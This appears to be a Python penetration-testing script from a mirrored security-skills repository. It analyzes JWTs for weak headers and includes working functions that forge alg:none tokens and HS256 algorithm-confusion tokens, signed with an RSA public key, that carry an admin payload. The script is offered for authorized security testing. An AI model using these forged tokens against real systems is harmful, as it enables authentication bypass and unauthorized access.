mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-10 21:24:56 +03:00
c47eed6a64
- Fix 25 shell=True subprocess calls with list-based commands - Fix 49 verify=False in defensive skills (env-var override) - Add timeout to 231 HTTP/subprocess/socket calls - Fix 6 SQL injection patterns with whitelist validation - Replace 8 __import__() with standard imports - Remove 701 unused imports across 442 files - Add authorized-testing disclaimers to all offensive skills - Complete 11 incomplete skill directories - Expand 10 stub SKILL.md files with full content - Fix 2 YAML parse errors in frontmatter - Fix 5 pre-existing syntax errors - Convert 22 hardcoded paths/ports to environment variables - Back up 21 redundant skill pairs to .bak - Fix 2 global declaration errors - 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE) - 0 compile errors across all 724 agent.py files
133 lines
4.9 KiB
Python
133 lines
4.9 KiB
Python
#!/usr/bin/env python3
|
|
"""Agent for testing JWT algorithm confusion vulnerabilities."""
|
|
|
|
import argparse
|
|
import base64
|
|
import hashlib
|
|
import hmac
|
|
import json
|
|
from datetime import datetime, timezone
|
|
|
|
|
|
def decode_jwt(token):
|
|
"""Decode a JWT token without verification."""
|
|
parts = token.split(".")
|
|
if len(parts) != 3:
|
|
return None
|
|
header = json.loads(base64.urlsafe_b64decode(parts[0] + "=="))
|
|
payload = json.loads(base64.urlsafe_b64decode(parts[1] + "=="))
|
|
return {"header": header, "payload": payload, "signature": parts[2]}
|
|
|
|
|
|
def forge_none_alg(payload_dict):
|
|
"""Create a JWT with alg:none (CVE in some libraries)."""
|
|
header = base64.urlsafe_b64encode(
|
|
json.dumps({"alg": "none", "typ": "JWT"}).encode()
|
|
).rstrip(b"=").decode()
|
|
payload = base64.urlsafe_b64encode(
|
|
json.dumps(payload_dict).encode()
|
|
).rstrip(b"=").decode()
|
|
return f"{header}.{payload}."
|
|
|
|
|
|
def forge_hs256_with_public_key(payload_dict, public_key_pem):
|
|
"""Forge JWT by signing with RSA public key as HMAC secret (alg confusion)."""
|
|
header = base64.urlsafe_b64encode(
|
|
json.dumps({"alg": "HS256", "typ": "JWT"}).encode()
|
|
).rstrip(b"=").decode()
|
|
payload = base64.urlsafe_b64encode(
|
|
json.dumps(payload_dict).encode()
|
|
).rstrip(b"=").decode()
|
|
signing_input = f"{header}.{payload}".encode()
|
|
key_bytes = public_key_pem.encode() if isinstance(public_key_pem, str) else public_key_pem
|
|
signature = hmac.new(key_bytes, signing_input, hashlib.sha256).digest()
|
|
sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b"=").decode()
|
|
return f"{header}.{payload}.{sig_b64}"
|
|
|
|
|
|
def analyze_jwt(token):
|
|
"""Analyze a JWT for common vulnerabilities."""
|
|
decoded = decode_jwt(token)
|
|
if not decoded:
|
|
return {"error": "Invalid JWT format"}
|
|
|
|
findings = []
|
|
header = decoded["header"]
|
|
payload = decoded["payload"]
|
|
|
|
alg = header.get("alg", "")
|
|
if alg.lower() == "none":
|
|
findings.append({"issue": "Algorithm set to 'none'", "severity": "CRITICAL"})
|
|
if header.get("jku"):
|
|
findings.append({"issue": f"JKU header present: {header['jku']}", "severity": "HIGH"})
|
|
if header.get("x5u"):
|
|
findings.append({"issue": f"X5U header present: {header['x5u']}", "severity": "HIGH"})
|
|
if header.get("kid"):
|
|
findings.append({"issue": f"KID header: {header['kid']}", "severity": "MEDIUM"})
|
|
|
|
exp = payload.get("exp")
|
|
if exp:
|
|
from datetime import datetime as dt
|
|
exp_dt = dt.fromtimestamp(exp, tz=timezone.utc)
|
|
if exp_dt < dt.now(timezone.utc):
|
|
findings.append({"issue": f"Token expired: {exp_dt.isoformat()}", "severity": "LOW"})
|
|
else:
|
|
findings.append({"issue": "No expiration claim", "severity": "MEDIUM"})
|
|
|
|
if payload.get("admin") or payload.get("role") in ("admin", "root"):
|
|
findings.append({"issue": "Admin role in payload", "severity": "INFO"})
|
|
|
|
return {
|
|
"header": header,
|
|
"payload": payload,
|
|
"algorithm": alg,
|
|
"findings": findings,
|
|
}
|
|
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(
|
|
description="Test JWT algorithm confusion vulnerabilities (authorized testing only)"
|
|
)
|
|
parser.add_argument("--token", help="JWT token to analyze")
|
|
parser.add_argument("--forge-none", action="store_true", help="Forge alg:none token")
|
|
parser.add_argument("--forge-hs256", help="Path to RSA public key for alg confusion")
|
|
parser.add_argument("--payload", help="JSON payload for forged token")
|
|
parser.add_argument("--output", "-o", help="Output JSON report")
|
|
args = parser.parse_args()
|
|
|
|
print("[*] JWT Algorithm Confusion Testing Agent")
|
|
print("[!] For authorized security testing only")
|
|
report = {"timestamp": datetime.now(timezone.utc).isoformat(), "findings": []}
|
|
|
|
if args.token:
|
|
analysis = analyze_jwt(args.token)
|
|
report["findings"].append({"type": "analysis", **analysis})
|
|
print(f"[*] Algorithm: {analysis.get('algorithm', 'unknown')}")
|
|
print(f"[*] Issues: {len(analysis.get('findings', []))}")
|
|
|
|
payload_dict = json.loads(args.payload) if args.payload else {"sub": "admin", "admin": True}
|
|
|
|
if args.forge_none:
|
|
forged = forge_none_alg(payload_dict)
|
|
report["findings"].append({"type": "forge_none", "token": forged})
|
|
print(f"[*] Forged alg:none token: {forged[:60]}...")
|
|
|
|
if args.forge_hs256:
|
|
with open(args.forge_hs256, "r") as f:
|
|
pub_key = f.read()
|
|
forged = forge_hs256_with_public_key(payload_dict, pub_key)
|
|
report["findings"].append({"type": "forge_hs256_confusion", "token": forged[:60] + "..."})
|
|
print(f"[*] Forged HS256 confusion token generated")
|
|
|
|
if args.output:
|
|
with open(args.output, "w") as f:
|
|
json.dump(report, f, indent=2)
|
|
print(f"[*] Report saved to {args.output}")
|
|
else:
|
|
print(json.dumps(report, indent=2))
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|